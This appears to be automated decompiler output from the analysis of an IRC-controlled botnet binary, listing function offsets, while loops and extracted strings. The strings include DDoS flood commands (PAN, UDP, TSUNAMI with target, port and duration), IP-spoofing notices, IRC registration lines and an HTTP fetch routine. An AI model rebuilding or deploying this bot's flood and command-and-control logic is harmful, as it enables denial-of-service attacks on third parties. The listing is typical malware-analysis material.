=================FUNCTION : function_149b4 ===================
++++++++ FUNCTION START 48498
++++++++ FUNCTION END 49039
++++++++ FUNCTION LENGTH 541
        while (true) {
                                    while (true) {
                                        while (true) {
                    while (true) {
=================FUNCTION : function_d70c ===================
++++++++ FUNCTION START 12624
++++++++ FUNCTION END 13506
++++++++ FUNCTION LENGTH 882
    while (true) {
        while (true) {
                while (true) {
                                                        while (true) {
=================FUNCTION : function_c864 ===================
++++++++ FUNCTION START 6427
++++++++ FUNCTION END 6947
++++++++ FUNCTION LENGTH 520
            while (true) {
                        while (true) {
                                while (true) {
                    while (true) {
=================FUNCTION : function_c930 ===================
++++++++ FUNCTION START 6950
++++++++ FUNCTION END 7535
++++++++ FUNCTION LENGTH 585
            while (true) {
                        while (true) {
                                while (true) {
                    while (true) {
=================FUNCTION : function_ee60 ===================
++++++++ FUNCTION START 18302
++++++++ FUNCTION END 18534
++++++++ FUNCTION LENGTH 232
        while (true) {
        while (true) {
        while (true) {
=================FUNCTION : function_138fc ===================
++++++++ FUNCTION START 44319
++++++++ FUNCTION END 44657
++++++++ FUNCTION LENGTH 338
                    while (true) {
        while (true) {
                                while (true) {
=================FUNCTION : function_ce94 ===================
++++++++ FUNCTION START 10031
++++++++ FUNCTION END 10235
++++++++ FUNCTION LENGTH 204
        while (true) {
            while (true) {
    while (true) {
=================FUNCTION : function_f8dc ===================
++++++++ FUNCTION START 22495
++++++++ FUNCTION END 22631
++++++++ FUNCTION LENGTH 136
    int32_t sock_fd = socket(domain, type, protocol); // 0xf8e0
    if (sock_fd >= 0xfffff001) {
        result = sock_fd;
=================FUNCTION : function_11080 ===================
++++++++ FUNCTION START 29799
++++++++ FUNCTION END 30114
++++++++ FUNCTION LENGTH 315
            while (true) {
            while (true) {
        while (true) {
=================FUNCTION : function_10354 ===================
++++++++ FUNCTION START 24749
++++++++ FUNCTION END 25045
++++++++ FUNCTION LENGTH 296
            while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_ddd0 ===================
++++++++ FUNCTION START 13833
++++++++ FUNCTION END 14135
++++++++ FUNCTION LENGTH 302
            while (true) {
                                    case 256: {
                                    case 512: {
=================FUNCTION : function_ef18 ===================
++++++++ FUNCTION START 18537
++++++++ FUNCTION END 18852
++++++++ FUNCTION LENGTH 315
            while (true) {
    while (true) {
    while (true) {
=================FUNCTION : function_f79c ===================
++++++++ FUNCTION START 21522
++++++++ FUNCTION END 21658
++++++++ FUNCTION LENGTH 136
    int32_t accepted_sock_fd = accept(sock, addr, (int32_t *)addr_len); // 0xf7a0
    if (accepted_sock_fd >= 0xfffff001) {
        result = accepted_sock_fd;
=================FUNCTION : function_bd88 ===================
++++++++ FUNCTION START 5816
++++++++ FUNCTION END 6055
++++++++ FUNCTION LENGTH 239
    while (true) {
                while (true) {
                        if (function_f7f4(v125, (struct sockaddr *)&v124, 16) == 0) {
=================FUNCTION : function_9a0c ===================
++++++++ FUNCTION START 3916
++++++++ FUNCTION END 4115
++++++++ FUNCTION LENGTH 199
        int32_t result = function_8374(a1, (int32_t)"NOTICE %s :Removed all spoofs\n"); // 0x9a44
        while (true) {
        result3 = function_8374(a1, (int32_t)"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n");
=================FUNCTION : function_8868 ===================
++++++++ FUNCTION START 2072
++++++++ FUNCTION END 2435
++++++++ FUNCTION LENGTH 363
    int32_t result2 = function_f7c8(result, (struct sockaddr *)&v126, 16, (int32_t)&v126, v127 / 0x1000000, v127 >> 31, 0, 0, 0); // 0x88f8
    uint32_t v130 = function_f79c(result, (struct sockaddr *)&v129, (int32_t)&v128, (int32_t)&v129, 16); // 0x8948
    while (true) {
=================FUNCTION : function_11174 ===================
++++++++ FUNCTION START 30255
++++++++ FUNCTION END 30467
++++++++ FUNCTION LENGTH 212
    while (true) {
            while (true) {
=================FUNCTION : function_137e0 ===================
++++++++ FUNCTION START 43937
++++++++ FUNCTION END 44108
++++++++ FUNCTION LENGTH 171
    while (true) {
        while (true) {
=================FUNCTION : function_a110 ===================
++++++++ FUNCTION START 4464
++++++++ FUNCTION END 4669
++++++++ FUNCTION LENGTH 205
        function_8374(a1, (int32_t)"NOTICE %s :PAN <target> <port> <secs>\n");
    while (true) {
=================FUNCTION : function_ec20 ===================
++++++++ FUNCTION START 17403
++++++++ FUNCTION END 17655
++++++++ FUNCTION LENGTH 252
        while (true) {
        while (true) {
=================FUNCTION : function_9d1c ===================
++++++++ FUNCTION START 4264
++++++++ FUNCTION END 4461
++++++++ FUNCTION LENGTH 197
        function_8374(a1, (int32_t)"NOTICE %s :UDP <target> <port> <secs>\n");
    while (true) {
=================FUNCTION : function_12514 ===================
++++++++ FUNCTION START 38870
++++++++ FUNCTION END 39038
++++++++ FUNCTION LENGTH 168
    while (true) {
        while (true) {
=================FUNCTION : function_f2a8 ===================
++++++++ FUNCTION START 20477
++++++++ FUNCTION END 20751
++++++++ FUNCTION LENGTH 274
    while (true) {
                    while (true) {
=================FUNCTION : function_10f84 ===================
++++++++ FUNCTION START 29068
++++++++ FUNCTION END 29235
++++++++ FUNCTION LENGTH 167
        v124 = sigprocmask(how, set, oset);
    v124 = sigprocmask(how, set, oset);
=================FUNCTION : function_145dc ===================
++++++++ FUNCTION START 47175
++++++++ FUNCTION END 47392
++++++++ FUNCTION LENGTH 217
    while (true) {
            while (true) {
=================FUNCTION : function_141bc ===================
++++++++ FUNCTION START 45995
++++++++ FUNCTION END 46127
++++++++ FUNCTION LENGTH 132
    int32_t result = function_cd94((int32_t)"/etc/hosts", (int32_t)&v123); // 0x141c8
        return function_cd94((int32_t)"/etc/config/hosts", (int32_t)&v123);
=================FUNCTION : function_1478c ===================
++++++++ FUNCTION START 47616
++++++++ FUNCTION END 47846
++++++++ FUNCTION LENGTH 230
        while (true) {
            while (true) {
=================FUNCTION : function_a6b8 ===================
++++++++ FUNCTION START 4672
++++++++ FUNCTION END 4875
++++++++ FUNCTION LENGTH 203
            function_8374(a1, (int32_t)"NOTICE %s :TSUNAMI <target> <secs>\n");
        while (true) {
=================FUNCTION : function_11510 ===================
++++++++ FUNCTION START 31279
++++++++ FUNCTION END 31516
++++++++ FUNCTION LENGTH 237
            while (true) {
    while (true) {
=================FUNCTION : function_e7a0 ===================
++++++++ FUNCTION START 15889
++++++++ FUNCTION END 16164
++++++++ FUNCTION LENGTH 275
            while (true) {
        while (true) {
=================FUNCTION : function_9560 ===================
++++++++ FUNCTION START 3179
++++++++ FUNCTION END 3316
++++++++ FUNCTION LENGTH 137
        result = function_8374(a1, (int32_t)"NOTICE %s :Spoofs: %d.%d.%d.%d\n");
        result = function_8374(a1, (int32_t)"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n");
=================FUNCTION : function_12554 ===================
++++++++ FUNCTION START 39041
++++++++ FUNCTION END 39262
++++++++ FUNCTION LENGTH 221
    while (true) {
        while (true) {
=================FUNCTION : function_10c10 ===================
++++++++ FUNCTION START 26782
++++++++ FUNCTION END 26921
++++++++ FUNCTION LENGTH 139
    int32_t result = vfork(); // 0x10c10
        int32_t result2 = fork(); // 0x10c28
=================FUNCTION : function_f00c ===================
++++++++ FUNCTION START 18985
++++++++ FUNCTION END 19239
++++++++ FUNCTION LENGTH 254
            while (true) {
                while (true) {
=================FUNCTION : function_b84c ===================
++++++++ FUNCTION START 4878
++++++++ FUNCTION END 5006
++++++++ FUNCTION LENGTH 128
    return function_8374(a1, (int32_t)"WHO %s\n");
=================FUNCTION : function_f7c8 ===================
++++++++ FUNCTION START 21661
++++++++ FUNCTION END 21797
++++++++ FUNCTION LENGTH 136
    int32_t v124 = bind(sock, addr, addr_len); // 0xf7cc
=================FUNCTION : function_cb18 ===================
++++++++ FUNCTION START 8363
++++++++ FUNCTION END 8499
++++++++ FUNCTION LENGTH 136
    int32_t v124 = kill(pid, sig_num); // 0xcb1c
=================FUNCTION : function_dd00 ===================
++++++++ FUNCTION START 13509
++++++++ FUNCTION END 13695
++++++++ FUNCTION LENGTH 186
    while (true) {
=================FUNCTION : function_d554 ===================
++++++++ FUNCTION START 11958
++++++++ FUNCTION END 12126
++++++++ FUNCTION LENGTH 168
        while (true) {
=================FUNCTION : function_f878 ===================
++++++++ FUNCTION START 22217
++++++++ FUNCTION END 22353
++++++++ FUNCTION LENGTH 136
    int32_t v124 = sendto(sock, message, length, flags, NULL, 0); // 0xf884
=================FUNCTION : function_108d8 ===================
++++++++ FUNCTION START 26249
++++++++ FUNCTION END 26613
++++++++ FUNCTION LENGTH 364
    while (true) {
=================FUNCTION : function_fc14 ===================
++++++++ FUNCTION START 23515
++++++++ FUNCTION END 23721
++++++++ FUNCTION LENGTH 206
        while (true) {
=================FUNCTION : function_ed3c ===================
++++++++ FUNCTION START 18004
++++++++ FUNCTION END 18299
++++++++ FUNCTION LENGTH 295
    while (true) {
=================FUNCTION : function_13168 ===================
++++++++ FUNCTION START 41010
++++++++ FUNCTION END 41146
++++++++ FUNCTION LENGTH 136
    int32_t v124 = send(sock, buf, length, flags); // 0x1316c
=================FUNCTION : function_e660 ===================
++++++++ FUNCTION START 15691
++++++++ FUNCTION END 15886
++++++++ FUNCTION LENGTH 195
            while (true) {
=================FUNCTION : function_13640 ===================
++++++++ FUNCTION START 43394
++++++++ FUNCTION END 43544
++++++++ FUNCTION LENGTH 150
    while (true) {
=================FUNCTION : function_f8ac ===================
++++++++ FUNCTION START 22356
++++++++ FUNCTION END 22492
++++++++ FUNCTION LENGTH 136
    int32_t v124 = setsockopt(sock, level, option_name, option_value, 0); // 0xf8b4
=================FUNCTION : function_85f8 ===================
++++++++ FUNCTION START 1747
++++++++ FUNCTION END 1893
++++++++ FUNCTION LENGTH 146
    while (true) {
=================FUNCTION : function_ca18 ===================
++++++++ FUNCTION START 7668
++++++++ FUNCTION END 7804
++++++++ FUNCTION LENGTH 136
    int32_t v124 = close(fd); // 0xca1c
=================FUNCTION : function_146e4 ===================
++++++++ FUNCTION START 47395
++++++++ FUNCTION END 47613
++++++++ FUNCTION LENGTH 218
    while (true) {
=================FUNCTION : function_f84c ===================
++++++++ FUNCTION START 22078
++++++++ FUNCTION END 22214
++++++++ FUNCTION LENGTH 136
    int32_t v124 = recv(sock, buf, length, flags); // 0xf850
=================FUNCTION : function_13660 ===================
++++++++ FUNCTION START 43547
++++++++ FUNCTION END 43720
++++++++ FUNCTION LENGTH 173
    while (true) {
=================FUNCTION : function_f7f4 ===================
++++++++ FUNCTION START 21800
++++++++ FUNCTION END 21936
++++++++ FUNCTION LENGTH 136
    int32_t v124 = connect(sock, addr, addr_len); // 0xf7f8
=================FUNCTION : function_fb4c ===================
++++++++ FUNCTION START 23048
++++++++ FUNCTION END 23234
++++++++ FUNCTION LENGTH 186
    while (true) {
=================FUNCTION : function_101c0 ===================
++++++++ FUNCTION START 24349
++++++++ FUNCTION END 24536
++++++++ FUNCTION LENGTH 187
            while (true) {
=================FUNCTION : function_df6c ===================
++++++++ FUNCTION START 14138
++++++++ FUNCTION END 14287
++++++++ FUNCTION LENGTH 149
    while (true) {
=================FUNCTION : function_f820 ===================
++++++++ FUNCTION START 21939
++++++++ FUNCTION END 22075
++++++++ FUNCTION LENGTH 136
    int32_t v124 = listen(sock, backlog); // 0xf824
=================FUNCTION : function_e984 ===================
++++++++ FUNCTION START 16167
++++++++ FUNCTION END 16412
++++++++ FUNCTION LENGTH 245
            while (true) {
=================FUNCTION : function_fd08 ===================
++++++++ FUNCTION START 23724
++++++++ FUNCTION END 23920
++++++++ FUNCTION LENGTH 196
    while (true) {
=================FUNCTION : function_10e94 ===================
++++++++ FUNCTION START 28467
++++++++ FUNCTION END 28608
++++++++ FUNCTION LENGTH 141
    int32_t fd = open(path, oflag); // 0x10ebc
=================FUNCTION : function_13718 ===================
++++++++ FUNCTION START 43723
++++++++ FUNCTION END 43934
++++++++ FUNCTION LENGTH 211
    while (true) {
=================FUNCTION : function_13b0c ===================
++++++++ FUNCTION START 44660
++++++++ FUNCTION END 44836
++++++++ FUNCTION LENGTH 176
    while (true) {
=================FUNCTION : function_f0f4 ===================
++++++++ FUNCTION START 19242
++++++++ FUNCTION END 19413
++++++++ FUNCTION LENGTH 171
    while (true) {
=================FUNCTION : function_13830 ===================
++++++++ FUNCTION START 44111
++++++++ FUNCTION END 44316
++++++++ FUNCTION LENGTH 205
    while (true) {
=================FUNCTION : function_10fd8 ===================
++++++++ FUNCTION START 29238
++++++++ FUNCTION END 29379
++++++++ FUNCTION LENGTH 141
    int32_t v124 = wait4(pid, status, options, (struct rusage *)rusage); // 0x10fdc
=================FUNCTION : function_d63c ===================
++++++++ FUNCTION START 12271
++++++++ FUNCTION END 12423
++++++++ FUNCTION LENGTH 152
    while (true) {
=================FUNCTION : function_14858 ===================
++++++++ FUNCTION START 47849
++++++++ FUNCTION END 48004
++++++++ FUNCTION LENGTH 155
    while (true) {
=================FUNCTION : function_ca70 ===================
++++++++ FUNCTION START 7946
++++++++ FUNCTION END 8082
++++++++ FUNCTION LENGTH 136
    int32_t pid = getpid(); // 0xca74
=================FUNCTION : function_ca44 ===================
++++++++ FUNCTION START 7807
++++++++ FUNCTION END 7943
++++++++ FUNCTION LENGTH 136
    int32_t v124 = fork(); // 0xca48
=================FUNCTION : function_bc88 ===================
++++++++ FUNCTION START 5600
++++++++ FUNCTION END 5813
++++++++ FUNCTION LENGTH 213
    while (true) {
=================FUNCTION : function_ca9c ===================
++++++++ FUNCTION START 8085
++++++++ FUNCTION END 8221
++++++++ FUNCTION LENGTH 136
    int32_t ppid = getppid(); // 0xcaa0
================================================================================
========	WHILE LOOPS INTRESTING INSTRUCTIONS : =================================
================================================================================
=============================WHILE LOOPS ID : 3 @ function_8df4 ====================================
++++++++ WHILE START : 2918 
++++++++ WHILE FUNCTION : function_8df4 
++++++++ WHILE END : 3172 
++++++++ INTRESTING INSTRUCTIONS :  
		if (function_f7f4(v127, (struct sockaddr *)&v136, 16) != 0) {
		function_8374(*v126, (int32_t)"NOTICE %s :Unable to connect to http.\n");
		function_8374(v127, (int32_t)"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n");
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 8 @ function_b90c ====================================
++++++++ WHILE START : 5263 
++++++++ WHILE FUNCTION : function_b90c 
++++++++ WHILE END : 5464 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		result2 = function_8374(a1, (int32_t)"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n");
=============================WHILE LOOPS ID : 10 @ function_bd88 ====================================
++++++++ WHILE START : 5943 
++++++++ WHILE FUNCTION : function_bd88 
++++++++ WHILE END : 6054 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		if (function_f7f4(v125, (struct sockaddr *)&v124, 16) == 0) {
=============================WHILE LOOPS ID : 11 @ function_c094 ====================================
++++++++ WHILE START : 6182 
++++++++ WHILE FUNCTION : function_c094 
++++++++ WHILE END : 6423 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		function_8374(v135, (int32_t)"NICK %s\nUSER %s localhost localhost :%s\n");
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 12 @ function_c864 ====================================
++++++++ WHILE START : 6585 
++++++++ WHILE FUNCTION : function_c864 
++++++++ WHILE END : 6935 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 13 @ function_c930 ====================================
++++++++ WHILE START : 7139 
++++++++ WHILE FUNCTION : function_c930 
++++++++ WHILE END : 7515 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 14 @ function_ce94 ====================================
++++++++ WHILE START : 10164 
++++++++ WHILE FUNCTION : function_ce94 
++++++++ WHILE END : 10212 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 18 @ function_d70c ====================================
++++++++ WHILE START : 12775 
++++++++ WHILE FUNCTION : function_d70c 
++++++++ WHILE END : 13505 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 20 @ function_ddd0 ====================================
++++++++ WHILE START : 13985 
++++++++ WHILE FUNCTION : function_ddd0 
++++++++ WHILE END : 14101 
++++++++ INTRESTING INSTRUCTIONS :  
		case 256: {
		case 512: {
=============================WHILE LOOPS ID : 22 @ function_dfb8 ====================================
++++++++ WHILE START : 14431 
++++++++ WHILE FUNCTION : function_dfb8 
++++++++ WHILE END : 15209 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 37 @ function_f00c ====================================
++++++++ WHILE START : 19121 
++++++++ WHILE FUNCTION : function_f00c 
++++++++ WHILE END : 19191 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 39 @ function_f2a8 ====================================
++++++++ WHILE START : 20605 
++++++++ WHILE FUNCTION : function_f2a8 
++++++++ WHILE END : 20750 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 51 @ function_11174 ====================================
++++++++ WHILE START : 30385 
++++++++ WHILE FUNCTION : function_11174 
++++++++ WHILE END : 30462 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 55 @ function_11660 ====================================
++++++++ WHILE START : 31820 
++++++++ WHILE FUNCTION : function_11660 
++++++++ WHILE END : 35017 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 64 @ function_11e00 ====================================
++++++++ WHILE START : 36813 
++++++++ WHILE FUNCTION : function_11e00 
++++++++ WHILE END : 36945 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 67 @ function_11e00 ====================================
++++++++ WHILE START : 37063 
++++++++ WHILE FUNCTION : function_11e00 
++++++++ WHILE END : 37126 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 70 @ function_11e00 ====================================
++++++++ WHILE START : 37171 
++++++++ WHILE FUNCTION : function_11e00 
++++++++ WHILE END : 37234 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 71 @ function_11e00 ====================================
++++++++ WHILE START : 37243 
++++++++ WHILE FUNCTION : function_11e00 
++++++++ WHILE END : 37306 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 75 @ function_11e00 ====================================
++++++++ WHILE START : 37485 
++++++++ WHILE FUNCTION : function_11e00 
++++++++ WHILE END : 37520 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 78 @ function_11e00 ====================================
++++++++ WHILE START : 37592 
++++++++ WHILE FUNCTION : function_11e00 
++++++++ WHILE END : 37627 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 79 @ function_11e00 ====================================
++++++++ WHILE START : 37662 
++++++++ WHILE FUNCTION : function_11e00 
++++++++ WHILE END : 37725 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 80 @ function_122a0 ====================================
++++++++ WHILE START : 38163 
++++++++ WHILE FUNCTION : function_122a0 
++++++++ WHILE END : 38278 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 83 @ function_123b4 ====================================
++++++++ WHILE START : 38581 
++++++++ WHILE FUNCTION : function_123b4 
++++++++ WHILE END : 38687 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 86 @ function_12514 ====================================
++++++++ WHILE START : 39004 
++++++++ WHILE FUNCTION : function_12514 
++++++++ WHILE END : 39037 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 87 @ function_12554 ====================================
++++++++ WHILE START : 39174 
++++++++ WHILE FUNCTION : function_12554 
++++++++ WHILE END : 39261 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 88 @ function_12640 ====================================
++++++++ WHILE START : 39427 
++++++++ WHILE FUNCTION : function_12640 
++++++++ WHILE END : 40246 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		if (function_f7f4(v159, (struct sockaddr *)&v132, 28) < 0) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 89 @ function_12e4c ====================================
++++++++ WHILE START : 40645 
++++++++ WHILE FUNCTION : function_12e4c 
++++++++ WHILE END : 40872 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 93 @ function_137e0 ====================================
++++++++ WHILE START : 44070 
++++++++ WHILE FUNCTION : function_137e0 
++++++++ WHILE END : 44105 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 96 @ function_138fc ====================================
++++++++ WHILE START : 44526 
++++++++ WHILE FUNCTION : function_138fc 
++++++++ WHILE END : 44645 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 98 @ function_13c70 ====================================
++++++++ WHILE START : 44981 
++++++++ WHILE FUNCTION : function_13c70 
++++++++ WHILE END : 45287 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 102 @ function_141f0 ====================================
++++++++ WHILE START : 46507 
++++++++ WHILE FUNCTION : function_141f0 
++++++++ WHILE END : 46738 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 103 @ function_145dc ====================================
++++++++ WHILE START : 47301 
++++++++ WHILE FUNCTION : function_145dc 
++++++++ WHILE END : 47389 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 105 @ function_1478c ====================================
++++++++ WHILE START : 47759 
++++++++ WHILE FUNCTION : function_1478c 
++++++++ WHILE END : 47842 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
=============================WHILE LOOPS ID : 107 @ function_148a4 ====================================
++++++++ WHILE START : 48282 
++++++++ WHILE FUNCTION : function_148a4 
++++++++ WHILE END : 48494 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
=============================WHILE LOOPS ID : 108 @ function_149b4 ====================================
++++++++ WHILE START : 48807 
++++++++ WHILE FUNCTION : function_149b4 
++++++++ WHILE END : 49035 
++++++++ INTRESTING INSTRUCTIONS :  
		while (true) {
		while (true) {
		while (true) {
